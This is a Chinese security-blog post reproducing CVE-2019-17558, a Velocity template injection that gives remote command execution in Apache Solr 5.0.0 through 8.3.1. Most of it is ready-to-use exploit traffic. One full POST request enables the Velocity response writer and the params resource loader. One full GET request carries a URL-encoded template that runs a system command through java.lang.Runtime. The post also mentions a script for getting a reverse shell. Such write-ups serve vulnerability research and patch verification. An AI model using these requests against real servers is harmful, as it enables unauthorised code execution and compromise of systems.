漏洞复现|ApacheSolrVelocity注入远程命令执行漏洞(CVE-2019-17558)

admin 2021年12月17日11:01:11安全文章评论119 views1920字阅读6分24秒阅读模式

简介

Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML,所以如果使用Solr 了解Java 技术会有用却不是必须的要求。

漏洞描述

Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助Velocity模板利用该漏洞在系统上执行任意代码。

影响版本

Apache Solr 5.0.0 - 8.3.1

漏洞复现

进入solr页面,用burp进行抓包,可以发现以下页面,其中name需要在接下来中用到


访问IP:8983/solr/demo/config , 出现以下页面很可能漏洞存在


通过burp抓包修改为POST包,200成功则漏洞一定存在


POST /solr/demo/config HTTP/1.1

Host: 192.168.8.230:30793

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/json

Content-Length: 261

Connection: close

Upgrade-Insecure-Requests: 1


{

  "update-queryresponsewriter": {

    "startup": "lazy",

    "name": "velocity",

    "class": "solr.VelocityResponseWriter",

    "template.base.dir": "",

    "solr.resource.loader.enabled": "true",

    "params.resource.loader.enabled": "true"

  }

}



通过burp改为GET包,执行id命令,成功


GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1

Host: 192.168.8.230:30793

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1



还可通过cve-2019-17558_cmd.py,去反弹回一个shell终端



相关推荐: 记一次在梦中对某oa系统的漏洞挖掘

0X01正文打开网站……先用7kb扫一波目录。哦吼,发现了一堆的目录遍历(绿色的都是)这里一个 Log目录十分的显眼,很有可能造成log泄露。okey,如我所料收获了一个通用中危洞 √27450-kwvsjna88f.png同时我找到了代表用户名的dlm接下来…

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日11:01:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  漏洞复现|ApacheSolrVelocity注入远程命令执行漏洞(CVE-2019-17558) https://cn-sec.com/archives/550027.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: